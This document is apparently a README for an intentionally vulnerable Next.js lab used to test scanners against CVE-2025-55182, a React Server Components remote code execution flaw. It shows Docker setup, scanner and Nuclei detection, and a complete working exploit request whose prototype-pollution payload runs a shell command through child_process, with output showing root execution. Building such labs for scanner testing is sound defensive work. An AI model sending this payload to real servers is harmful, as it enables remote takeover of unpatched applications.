Share
## https://sploitus.com/exploit?id=28FE6AA8-5E0F-5C22-AD90-0DB109A3551D
# CVE-2025-55182
This repository provides a minimal intentionally vulnerable environment to test security scanners against the recent critical RCE vulnerabilities affecting React Server Components and Next.js.
> [!Warning]
> This setup is intentionally vulnerable and must never be exposed to the public internet or used in production.
---
## What is this
This app is a very small Next.js project that:
- Uses the App Router (`app/` directory)
- Enables React Server Components / server actions
- Pins **vulnerable versions** of:
- `next`: `16.0.6`
- `react`: `19.2.0`
- `react-dom`: `19.2.0`
## How to run
```bash
docker run --rm -p 127.0.0.1:3000:3000 ghcr.io/l4rm4nd/cve-2025-55182:latest
```
## How to detect
### AssetNote Scanner
Use the scanner provided by AssetNote:
```bash
git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
virtualenv venv && source venv/bin/activate
python3 scanner.py -u http://127.0.0.1:3000
```
Will return:
```bash
โฐโ(venv) โ โ ต python3 scanner.py -u http://127.0.0.1:3000
brought to you by assetnote
[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled
[VULNERABLE] http://127.0.0.1:3000 - Status: 303
```
### Nuclei
```bash
nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000
```
Will return:
```bash
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://127.0.0.1:3000
```
## How to exploit
PoC HTTP payload from [here](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#payload-that-can-see-command-execution-result-in-response-body-most-useful).
```http
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
Will return:
```http
HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
x-nextjs-cache: HIT
x-nextjs-prerender: 1
Content-Type: text/x-component
Date: Fri, 05 Dec 2025 11:53:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 195
0:{"a":"$@1","f":"","b":"PAoMR732SpRI6Xw9cbfbD"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}
```